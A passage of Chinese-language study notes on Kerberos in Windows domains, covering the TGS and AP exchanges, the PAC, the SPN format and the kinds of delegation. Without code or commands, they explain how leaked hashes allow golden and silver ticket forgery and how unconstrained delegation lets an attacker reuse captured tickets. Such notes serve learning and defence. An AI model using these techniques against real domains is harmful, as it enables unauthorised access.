  - KDC 返回的 TGT 客户端是无法解密的，因为它没有 KDC Hash，如果有，我们就可以伪造黄金票据
请求授权访问服务
- 客户端向 TGS 发送请求服务授权请求
  
  KRB-TGS-REQ：Client 收到 sessionkey_as 和 TGT 后，使用 Client 密钥（AA 的 NTLM Hash）对 sessionkey_as 解密就能得到 Client/TGS Session Key，然后使用 Client/TGS Session Key 对 Client Info 和 timestamp 加密得到 Authenticator2。
  
  将 Authenticator2、TGT、Service ID（要请求的服务 ID）发送给 KDC 中的 TGS。
  - 由于 TGT 是使用 TGS 密钥(krbtgt 的 NTLM Hash)加密的，Client 无法对 TGT 解密。
  - 如果假设这个数据被中间人窃取到，也无法在短时间内破解，因为 KDC 会校验时间戳。
- TGS 为 Client 响应服务授权票据
  
  TGS-REP：TGS 收到请求后，检查 KDC 数据库中是否存在所请求的服务(Service ID)。如果存在，TGS 使用 TGS 密钥(krbtgt 的 NTLM Hash)解密 TGT，得到 Client/TGS Session Key、timestamp、Client info；同时使用从 TGT 中解密得到的 Client/TGS Session Key 去解密 Authenticator2，得到 Client info 和 timestamp。比对 Authenticator2 和 TGT 的解密内容以验证通过。
  - TGS 比对 Authenticator2 包含的 Client ID 和 TGT 中的 Client ID
  - 比较时间戳（误差范围在2分钟）
  - 通过生命周期字段检查 TGT 是否过期
  - 检查 Authenticator2 已经不再 TGS 的缓存中
  - 若原始请求中的网络地址不为 NULL，比较 TGT 中的 IP 和请求的 IP
  验证成功后，随机生成 Client 所请求服务的会话密钥 Client/Server Session Key；
  
  使用 Server 密钥（即服务器计算机的NTLM Hash）对 Client/Server Session Key、Client Info（包含 Client ID）、TimeStamp 加密得到 Client-To-Server Ticket（也称为 ST 票据）；
  
  使用 Client/TGS Session Key 对 Client/Server Session Key 加密得到 sessionkey_tgs
  
  最终将 Client-To-Server Ticket、sessionkey_tgs 返回给 Client。
请求服务
- Client 向 SS(Service Server)发送服务请求
  
  AP-REQ：Client 收到 Client-To-Server Ticket、sessionkey_tgs 之后，使用 Client/TGS Session Key 对 sessionkey_tgs 解密得到 Client/Server Session Key,然后使用 Client/Server Session Key 对 Client Info 和 timestamp 加密得到 Authenticator3
  
  将 Authenticator3 和 Client-To-Server Ticket 发送给所请求服务的服务器(Service Server)。
  - Ticket 客户端无法解密
- Service Server 响应 Client
  
  AP-REP：Service Server 收到客户端的服务访问请求之后，利用 Server 密钥(Server 的 ntlm Hash)对 Client-To-Server Ticket 解密，提取出 Client/Server SessionKey、Client ID 等信息。
  
  Service Server 使用 Client/Server SessionKey 对 Authenticator3 解密得到 Client ID 和 TimeStamp。
  
  类似于 TGS，Service Server 也要做如下校验：
  - Client ID;
  - 时间戳；
  - ticket 是否过期；
  - 避免重放攻击，查看 Service Server 的 cache 是否包含 authenticator3；
  - 网络地址比较
  Service Server 发送最后的验证消息——用 Client/Server SessionKey 加密的 Timestamp 和 Service ID 数据包给 Client。
  
  Client 收到之后，使用缓存的 Client/Server SessionKey 解密提取 Timestamp 信息，然后确认该信息与 Client 发送的 Authenticator3 中的 Timestamp 信息是否一致。验证通过后，在定义的通讯周期内，Client 可以使用票据请求 Service。
  
  由此完成了 Client 和 Service Server 的双向认证。
  - Kerberos 协议设计的思路就是用来在不受信的环境下进行认证的协议。
  - krbtgt 账号的 NTLM Hash 理论上只存在于 KDC 中。这意味着 TGT 只能由 KDC 来解密。如果 krbtgt 账号的 NTLM Hash 泄露了，那么 TGT 就能被解密甚至伪造。伪造的 TGT 叫做黄金票据。
  - Ticket 是由服务器计算机本身的 NTLM Hash 加密的，Client 不能解密。如果该 Hash 泄露，那么就可以解密甚至伪造 Ticket。伪造的 Ticket 叫做白银票据。
  - 在上述的流程中，涉及到时间戳 timestamp，由于它的存在，才使得被第三方获取了加密信息 Authenticator1 、Authenticator2、TGT 不会在短时间内被暴力破解。timestamp 一般时间为8小时。
  - Kerberos 协议和 NTLM 协议都会使用 NTLM Hash 对生成的任意随机数加密，然后比对结果。 Kerberos 的主要区别在于添加了第三方——-KDC 参与到认证过程中。
  - Client info 中包含网络地址、Client ID 等信息

每次交互 Client 可以收到两条消息，一条是可以解密的，一条是无法解密的
Client 期望访问的服务或者主机从不直接与 KDC 通信
KDC 存储了其数据库下所有主机和服务的密钥
密钥由密码加上一组随机数的哈希值，哈希算法由 Kerberos 的具体实现选择。对于服务和主机而言，其本身是没有密码的。
所有密钥存储于 KDC 数据库
KDC 本身由主密钥加密
已经存在 Kerberos 的配置和实现采用公钥加密

PAC

上述为 RFC 规定的 Kerberos 认证授权流程(其中 NTLM Hash 是针对 Windows 举例的)，而微软所实现的 Kerberos 工作流程与之则有所不同，其区别的关键就在于，KDC 所返回的 KRB_AS_REP 中将包含一组 PAC 的信息。

PAC 的全称是 Privilege Attribute Certificate(特权属性证书)。其中所包含的是各种授权信息，例如用户所属的用户组、用户所具有的权限等。（User SID 和 Groups SID）

为了防止被伪造和串改，在 PAC 中包含有两个数字签名 PAC_SERVER_CHECKSUM 和 PAC_PRIVSVR_CHECKSUM ，这两个数字签名分别由 Server 端密码 HASH 和 KDC 的密码 HASH 加密。

正如上文所述，当用户与 KDC 之间完成了认证过程之后，用户需要访问服务器所提供的某项服务时，服务器为了判断用户是否具有合法的权限必须通过将用户的用户名传递给 KDC， KDC 通过得到的用户名查询用户的用户组信息，用户权限等，进而返回给服务器，服务器再将此信息与用户所索取的资源的 ACL 进行比较，最后决定是否给用户提供相应的服务。

在 Windows 的 Kerberos 实现中，默认情况下，KRB_AS_REP 信息中将包含一组 PAC 信息，也就是说，用户所得到的 TGT（TicketGranting Ticket）会包含用户的授权信息。用户再用包含有授权信息的 TGT 去申请相应的 Service Ticket，KDC 在收到这个 KBR_AP_REQ 请求的时候，将 TGT 里的 PAC 信息解析出来，加入到 Service Ticket 里返回。接下来，当用户向服务器程序提交 KRB_AP_REQ 消息时，服务器程序则将其中所包含的 PAC 信息传送给操作系统得到一个访问令牌，并且同时将这个 PAC 的数字签名以 KRB_VERIFY_PAC 的消息传输给 KDC， KDC 再将验证这个 PAC 的数字签名的结果以 RPC 返回码的形式告诉服务器，服务器就可以根据这个结果判断 PAC 数据的真实性和完整性，并做出最后对 KRB_AP_REQ 的判断。

优点：
- 以后对资源的访问中，服务端再接收到客户的请求的时候不再需要借助 KDC 的帮助提供完整的授权信息来完成对用户权限的判断，而只需要根据请求中所包含的 PAC 信息直接与本地资源的 ACL 相比较做出裁决。
- 解决 PAC 欺骗，防止攻击者利用篡改的 PAC 信息实现未授权访问
缺点：
- PAC 在用户的认证阶段引入会导致认证耗时过长。（Windows Kerberos 客户端会通过 RPC 调用 KDC 上的函数来验证 PAC 信息，这时候用户会观察到在服务器端与 KDC 之间的 RPC 包流量的增加。）
- 由于 PAC 是微软特有的一个特性，所以启用了 PAC 的域中将不支持装有其他操作系统的服务器，制约了域配置的灵活性

SPN

服务主体名称（SPN：Service Principal Names）是服务实例（可以理解为一个服务，比如HTTP、MSSQL）的唯一标识符（即服务器上所运行服务的唯一标识）。Kerberos使用SPN将服务实例与服务登录帐户相关联。如果在整个域或域林中的计算机上安装多个服务实例，则每个实例都必须具有自己的SPN。如果客户端使用多个名称进行身份验证，则给定的服务实例具有多个SPN。SPN始终包含运行服务实例的主机名称，因此服务实例可以为其主机的每个名称或别名注册SPN。

使用 Kerberos 的域认证认证服务，需要正确配置 SPN

SPN 在其注册的域林中必须是唯一的，若不唯一，则身份验证就会失败。

SPN 的格式：

<service type>/<host>:<port>/<DistinguishedName>

// <service type>：服务类型，如LDAP、TERMSRV、SMTP、MSSQL、HTTP
// <host>：服务所在主机名称，可以是FQDN(如data.test.lab、server.test.lab)和NetBIOS名(如data、server)

// <port>：服务端口，若服务运行在默认端口上，则端口号可以省略
// <Distinguished Name>：专有名称

通用服务类型 ,可参考 https://adsecurity.org/?page_id=183

委派

委派(Delegation)：是一种让用户可以委托服务器代表自己与其他服务进行验证的功能，它允许服务账户在活动目录中模拟其他域用户身份，主要用于当服务需要以某个用户的身份来请求访问其他服务资源的场景。比如，在域内，用户 Jack 经过 Kerberos 身份验证访问服务 Web（服务 web 处于域），Web 服务再以 Jack 的身份去请求域中的服务 MSSQL，若 Jack 有权限访问就能访问成功，这种过程就是委派的一个过程。

域委派的4种主要方式：

无约束委派
- 表示你授予该帐户权限以委派任何服务，前提是满足启动委派所需的所有其他步骤。
- 从 IT 安全角度来看，此选项最容易配置但安全性最低。
约束委派 - 仅限 Kerberos
- 更安全，它将委派任务限制到指定列表，不像无约束委派允许委派给任何服务。
- 与无约束委派相比，需要额外配置。
- 必须确保在帐户上设置 SPN 并添加允许帐户委派的服务。
协议转换
基于资源的约束委派

用户在 Kerberos 认证中访问服务 A 和服务 B 的过程图：

后改进了这种同一用户访问多服务的过程，实现了 A 服务模拟用户访问 B 服务的过程。

在用户发送一个 ST(图中为 TGS)访问服务时，连同其TGT一起发送，服务 A 使用用户的 TGT 向服务B进行 ST(图中为 TGS)，进而简化了用户请求服务 B 资源时验证访问的认证过程。这种就是无约束委派（TrustedForDelegation）的过程：

无约束委派过程中，如果攻击者截获了 Service A 验证的 ST 和 TGT，就可以用它们访问服务 B，进而模拟管理员访问任意服务，漫游内网。

约束委派

为了解决无约束委派的隐患，微软发布了约束委派（S4U2Proxy）。

若服务 A 允许委派给服务B，则 A 能使用 S4U2Proxy 协议将用户发送的 TS(图中的 TGS，TGS 必须是可转发的) 再转发给域控制器认证，为用户请求访问服务 B 的 TS(图中的 TGS)。接着，服务 A 就能使用新获得的 TS(图中的 TGS）模拟用户访问服务 B:

上图中用户是通过 Kerberos 协议与服务 A 进行认证的，而当用户以其他方式(如 NTLM 认证，基于表单的认证等方式)与 Web 服务器进行认证后，用户是无法向 Web 服务器提供请求该服务的 TS(图中的 TGS)，因而服务器 A 也无法进一步使用 S4U2Proxy 协议请求访问服务 B。S4U2Self 协议便是解决该问题的方案，被设置为 TrustedToAuthForDelegation 的服务能够调用 S4U2Self 向认证服务器为任意用户请求访问自身的可转发的服务票据，此后，便可通过 S4U2Proxy 使用这张 TGS 向域控制器请求访问 B 的票据。这就是协议转换委派(S4U2Self/TrustedToAuthForDelegation)：

基于资源的约束委派

传统的约束委派中仍然存在一些缺点，如无法进行跨域委派。微软在 Windows Server 2012 中引入了基于资源的约束委派，相对于传统的约束委派，主要有三处改进:

委派的权限授予给了拥有资源的后端(B)而不再是前端(A)
不再需要域管理员权限设置委派，只需拥有在计算机对象上编辑 msDS-AllowedToActOnBehalfOfOtherIdentity 属性的权限
委派功能现在可以跨域和林

基于资源的约束委派(Resource-Based Constrained Delegation)是一种允许资源自己去设置哪些账户委派给自己的约束委派。

传统的约束委派是“正向的”，通过修改服务 A 属性 msDS-AllowedToDelegateTo，添加服务 B 的 SPN（Service Principle Name），设置约束委派对象（服务 B），服务 A 便可以模拟用户向域控制器请求访问服务B以获得服务票据（TGS）来使用服务 B 的资源。

而基于资源的约束委派则是相反的，通过修改服务 B 属性 msDS-AllowedToActOnBehalfOfOtherIdentity，添加服务 A 的 SPN，达到让服务 A 模拟用户访问 B 资源的目的。